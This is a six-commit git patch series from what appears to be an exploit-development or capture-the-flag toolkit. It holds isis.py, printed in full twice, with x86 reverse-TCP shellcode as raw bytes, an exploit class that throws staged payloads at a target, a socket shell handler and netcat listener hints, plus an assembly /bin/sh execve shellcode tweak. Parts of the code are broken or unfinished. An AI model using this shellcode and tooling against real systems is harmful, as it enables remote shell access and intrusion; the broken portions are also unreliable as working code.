From 365561c8e8767f776819caabb1dc91879d6d8564 Mon Sep 17 00:00:00 2001 From: ezliang Date: Tue, 17 Mar 2015 03:39:39 -0400 Subject: [PATCH 1/6] added hold debugger function basically helps with holding the debugger to attach with gdb; can pass the process name to get the last process id --- isis/isis.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/isis/isis.py b/isis/isis.py index 1451599..71d6f8e 100644 --- a/isis/isis.py +++ b/isis/isis.py @@ -272,6 +272,15 @@ def hd(s,n,le=True): fmt_str = '{:#08x}:' + (' {{:#0{pad}x}}'.format(pad=(n*2+2)))*len(line) print fmt_str.format(addr,*line) addr += 0x10 + +def hold_debugger(program_name=None): + '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' + if(program_name): + print program_name+" pid:"+str(map(int,check_output(["pidof",program_name]).split())[-1]) + + print "Attach Debugger..." + while(raw_input() != 'c'): + pass if __name__ == '__main__': import code From 297161fe7734c93361e478c334147d640ae50768 Mon Sep 17 00:00:00 2001 From: ezliang Date: Tue, 17 Mar 2015 03:49:07 -0400 Subject: [PATCH 2/6] added import for hold_debugger function --- isis/isis.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/isis/isis.py b/isis/isis.py index 71d6f8e..a3c7f37 100644 --- a/isis/isis.py +++ b/isis/isis.py @@ -5,6 +5,8 @@ import telnetlib import select import string + +from subprocess import check_output from struct import pack,unpack from string import ascii_lowercase as ALPHABET From eff8ea126a2f35912e9e8d65932a4521e9d8fde5 Mon Sep 17 00:00:00 2001 From: ezliang Date: Mon, 23 Mar 2015 18:38:29 -0400 Subject: [PATCH 3/6] changed from pidof to pgrep in hold_debugger pgrep makes latest pid the last process --- isis/isis.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/isis/isis.py b/isis/isis.py index a3c7f37..8d5477e 100644 --- a/isis/isis.py +++ b/isis/isis.py @@ -278,7 +278,7 @@ def hd(s,n,le=True): def hold_debugger(program_name=None): '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' if(program_name): - print program_name+" pid:"+str(map(int,check_output(["pidof",program_name]).split())[-1]) + print program_name+" pid:"+str(map(int,check_output(["pgrep",program_name]).split())[-1]) print "Attach Debugger..." while(raw_input() != 'c'): From 2906af6765e59c097b6459d8a7e7fa98531cdc59 Mon Sep 17 00:00:00 2001 From: Christopher Thompson Date: Fri, 24 Apr 2015 12:09:01 +0000 Subject: [PATCH 4/6] Removed isis.py --- isis/isis.py | 291 --------------------------------------------------- 1 file changed, 291 deletions(-) delete mode 100644 isis/isis.py diff --git a/isis/isis.py b/isis/isis.py deleted file mode 100644 index 8d5477e..0000000 --- a/isis/isis.py +++ /dev/null @@ -1,291 +0,0 @@ -import re -import socket -import time -import sys -import telnetlib -import select -import string - -from subprocess import check_output -from struct import pack,unpack -from string import ascii_lowercase as ALPHABET - - -class Exploit(): - def __init__(self, ip_addr, port, exploit_type): - self.ip = ip_addr - self.port = port - self.type = exploit_type - - self.connectback = None - self.bind = None - - self.stage = [] # list of input to send to get to arbitrary execution - self.shellcode = None - - def connect_back(self, ip_addr, port): - self.connectback = (ip_addr, port) - - def bind_shell(self, port): - self.bind = port - - def prepare(self, input): - self.stage.append(input) - - def generate(self, arch='x86'): - if self.type == 'connectback': - if self.connectback == None: - raise RuntimeError("You haven't set parameters for the connect back") - self.shellcode = reverse_tcp(self.connectback[0], self.connectback[1], arch) - elif self.type == 'bind': - if self.bind == None: - raise RuntimeError("You haven't set parameters for the bind shell") - self.shellcode = bind_shell(self.bind, arch) # needs implementation - - def display(self): - for x in self.stage: - sys.stdout.write(x) - sys.stdout.write(repr(self.shellcode)[1:-1]) - - def throw(self): # needs implementation - connect = get_socket((self.ip, self.port)) - for send in self.stage: - connect.send(send) - time.sleep(.5) - print sock.recv(0x10000) - connect.send(self.shellcode) - - -def bind_shell(port, arch='x86'): - ''' - Generate x86 bind shell shellcode (You connnect to the shell) - - Usage: - reverse_tcp(ip_addr, port) - ip_addr = connect back IP address as string - port = connect back port as int - - A command you could use to setup a connection on your system is 'nc 127.0.0.1 7788' - With 127.0.0.1 replaced with the ip of the target box. - ''' - - if arch.lower() == 'x86': - port = pack('>H', port) - BIND_SHELL = BIND_SHELL_X86 - pass - -def reverse_tcp(ip_addr, port, arch='x86'): - ''' - Generate x86 reverse tcp shellcode (The shell connects to you) - - Usage: - reverse_tcp(ip_addr, port) - ip_addr = connect back IP address as string - port = connect back port as int - - A command you could use to setup a listener on your system is 'nc -vl 7788' - ''' - - if arch.lower() == 'x86': - ip = ''.join([chr(int(x)) for x in ip_addr.split('.')]) - port = pack('>H', port) - - REVERSE_TCP_X86 = ( - '\x31\xc0\x89\xc3\x50\x6a\x01\x6a\x02\x43\xb0\x66\x89\xe1\xcd\x80\x89\xc6' - '\x31\xc0\xb0\x66\x43\x68' + ip + '\x66\x68' + port + '\x66\x53\x89\xe1' - '\x6a\x10\x51\x56\x43\x89\xe1\xcd\x80\x89\xc7\x31\xc9\x89\xc8\x89\xca\xb1' - '\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f' - '\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x89\xca\xcd\x80' - ) - - REVERSE_TCP = REVERSE_TCP_X86 - - elif arch.lower() == 'x64': - REVERSE_TCP = REVERSE_TCP_X64 # need implementation - - elif arch.lower() == 'arm': - REVERSE_TCP == REVERSE_TCP_ARM # need implementation - - elif arch.lower() == 'mips': - REVERSE_TCP = REVERSE_TCP_MIPS # need implementation - - banned = ('\x00', '\x0a', '\x0d') - for x in banned: - if x in REVERSE_TCP_X86: - print 'This shellcode may not work because of {} at index {}'.format(repr(x), REVERSE_TCP.index(x)) - - return REVERSE_TCP_X86 - -def is_ipv6(ip): - return ':' in ip - -def get_socket(chal): - '''chal is a 2-tuple with an address and a port ex: ('127.0.0.1',111)''' - #is ipv6? - ip, port = chal - if is_ipv6(ip): - s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0) - s.settimeout(5) - s.connect((ip, port, 0, 0)) - else:#ipv4 - s = socket.socket() - s.settimeout(5) - s.connect(chal) - return s - - -def shell(sock): - ''' - pass to this function a socket object with a - listening shell(socket reuse) - ''' - command = '' - prompt = '$ ' - - while command != 'exit\n': - r,w,x = select.select([sock,sys.stdin], [sock], []) - if r: - for reading in r: - if reading == sock: - print reading.recv(0x10000) - if reading == sys.stdin: - command = reading.readline() - sock.send(command) - return - - -def lei(*nums): - ''' - wrapper for struct.pack("I/i"), will identify signdness and - takes a variable number of arguments - ''' - if len(nums) == 1: - num = nums[0] - if num > 0: - return pack(" 0 : - return pack("') + fmt_mapping[n] - - elems = map(lambda a:unpack(fmt,'\0'*(n-len(a))+a)[0],elems) - - addr = 0 - - for line in chunk(elems,0x10/n): - #addr, [elems..] - fmt_str = '{:#08x}:' + (' {{:#0{pad}x}}'.format(pad=(n*2+2)))*len(line) - print fmt_str.format(addr,*line) - addr += 0x10 - -def hold_debugger(program_name=None): - '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' - if(program_name): - print program_name+" pid:"+str(map(int,check_output(["pgrep",program_name]).split())[-1]) - - print "Attach Debugger..." - while(raw_input() != 'c'): - pass - -if __name__ == '__main__': - import code - code.interact(local=locals()) - - From 071e9407be0009bb8a5085a01fbec37db4834f39 Mon Sep 17 00:00:00 2001 From: Shark64 Date: Thu, 7 May 2015 22:17:20 +0200 Subject: [PATCH 5/6] change xor reg, reg to 32bit version the x86-64 instruction behaviour is to zero the upper 32bits for 32bit operands, so xor eax, eax = xor rax, rax, but 1 byte shorter. --- 64BitLocalBinSh/shell64.s | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/64BitLocalBinSh/shell64.s b/64BitLocalBinSh/shell64.s index 1555248..044c8a9 100644 --- a/64BitLocalBinSh/shell64.s +++ b/64BitLocalBinSh/shell64.s @@ -8,13 +8,13 @@ BITS 64 global main main: - xor rax, rax + xor eax, eax push rax mov rdi, 0x68732f2f6e69622f ;/bin//sh push rdi mov al, execve mov rdi, rsp - xor rsi, rsi - xor rdx, rdx + xor esi, esi + xor edx, edx syscall From 794875fed8e42392b83255233c2e0df4af4b89c9 Mon Sep 17 00:00:00 2001 From: CodeKevin Date: Sat, 30 Apr 2016 01:19:50 -0400 Subject: [PATCH 6/6] Revert "Removed isis.py" This reverts commit 2906af6765e59c097b6459d8a7e7fa98531cdc59. --- isis/isis.py | 291 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 291 insertions(+) create mode 100644 isis/isis.py diff --git a/isis/isis.py b/isis/isis.py new file mode 100644 index 0000000..8d5477e --- /dev/null +++ b/isis/isis.py @@ -0,0 +1,291 @@ +import re +import socket +import time +import sys +import telnetlib +import select +import string + +from subprocess import check_output +from struct import pack,unpack +from string import ascii_lowercase as ALPHABET + + +class Exploit(): + def __init__(self, ip_addr, port, exploit_type): + self.ip = ip_addr + self.port = port + self.type = exploit_type + + self.connectback = None + self.bind = None + + self.stage = [] # list of input to send to get to arbitrary execution + self.shellcode = None + + def connect_back(self, ip_addr, port): + self.connectback = (ip_addr, port) + + def bind_shell(self, port): + self.bind = port + + def prepare(self, input): + self.stage.append(input) + + def generate(self, arch='x86'): + if self.type == 'connectback': + if self.connectback == None: + raise RuntimeError("You haven't set parameters for the connect back") + self.shellcode = reverse_tcp(self.connectback[0], self.connectback[1], arch) + elif self.type == 'bind': + if self.bind == None: + raise RuntimeError("You haven't set parameters for the bind shell") + self.shellcode = bind_shell(self.bind, arch) # needs implementation + + def display(self): + for x in self.stage: + sys.stdout.write(x) + sys.stdout.write(repr(self.shellcode)[1:-1]) + + def throw(self): # needs implementation + connect = get_socket((self.ip, self.port)) + for send in self.stage: + connect.send(send) + time.sleep(.5) + print sock.recv(0x10000) + connect.send(self.shellcode) + + +def bind_shell(port, arch='x86'): + ''' + Generate x86 bind shell shellcode (You connnect to the shell) + + Usage: + reverse_tcp(ip_addr, port) + ip_addr = connect back IP address as string + port = connect back port as int + + A command you could use to setup a connection on your system is 'nc 127.0.0.1 7788' + With 127.0.0.1 replaced with the ip of the target box. + ''' + + if arch.lower() == 'x86': + port = pack('>H', port) + BIND_SHELL = BIND_SHELL_X86 + pass + +def reverse_tcp(ip_addr, port, arch='x86'): + ''' + Generate x86 reverse tcp shellcode (The shell connects to you) + + Usage: + reverse_tcp(ip_addr, port) + ip_addr = connect back IP address as string + port = connect back port as int + + A command you could use to setup a listener on your system is 'nc -vl 7788' + ''' + + if arch.lower() == 'x86': + ip = ''.join([chr(int(x)) for x in ip_addr.split('.')]) + port = pack('>H', port) + + REVERSE_TCP_X86 = ( + '\x31\xc0\x89\xc3\x50\x6a\x01\x6a\x02\x43\xb0\x66\x89\xe1\xcd\x80\x89\xc6' + '\x31\xc0\xb0\x66\x43\x68' + ip + '\x66\x68' + port + '\x66\x53\x89\xe1' + '\x6a\x10\x51\x56\x43\x89\xe1\xcd\x80\x89\xc7\x31\xc9\x89\xc8\x89\xca\xb1' + '\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f' + '\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x89\xca\xcd\x80' + ) + + REVERSE_TCP = REVERSE_TCP_X86 + + elif arch.lower() == 'x64': + REVERSE_TCP = REVERSE_TCP_X64 # need implementation + + elif arch.lower() == 'arm': + REVERSE_TCP == REVERSE_TCP_ARM # need implementation + + elif arch.lower() == 'mips': + REVERSE_TCP = REVERSE_TCP_MIPS # need implementation + + banned = ('\x00', '\x0a', '\x0d') + for x in banned: + if x in REVERSE_TCP_X86: + print 'This shellcode may not work because of {} at index {}'.format(repr(x), REVERSE_TCP.index(x)) + + return REVERSE_TCP_X86 + +def is_ipv6(ip): + return ':' in ip + +def get_socket(chal): + '''chal is a 2-tuple with an address and a port ex: ('127.0.0.1',111)''' + #is ipv6? + ip, port = chal + if is_ipv6(ip): + s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0) + s.settimeout(5) + s.connect((ip, port, 0, 0)) + else:#ipv4 + s = socket.socket() + s.settimeout(5) + s.connect(chal) + return s + + +def shell(sock): + ''' + pass to this function a socket object with a + listening shell(socket reuse) + ''' + command = '' + prompt = '$ ' + + while command != 'exit\n': + r,w,x = select.select([sock,sys.stdin], [sock], []) + if r: + for reading in r: + if reading == sock: + print reading.recv(0x10000) + if reading == sys.stdin: + command = reading.readline() + sock.send(command) + return + + +def lei(*nums): + ''' + wrapper for struct.pack("I/i"), will identify signdness and + takes a variable number of arguments + ''' + if len(nums) == 1: + num = nums[0] + if num > 0: + return pack(" 0 : + return pack("') + fmt_mapping[n] + + elems = map(lambda a:unpack(fmt,'\0'*(n-len(a))+a)[0],elems) + + addr = 0 + + for line in chunk(elems,0x10/n): + #addr, [elems..] + fmt_str = '{:#08x}:' + (' {{:#0{pad}x}}'.format(pad=(n*2+2)))*len(line) + print fmt_str.format(addr,*line) + addr += 0x10 + +def hold_debugger(program_name=None): + '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' + if(program_name): + print program_name+" pid:"+str(map(int,check_output(["pgrep",program_name]).split())[-1]) + + print "Attach Debugger..." + while(raw_input() != 'c'): + pass + +if __name__ == '__main__': + import code + code.interact(local=locals()) + +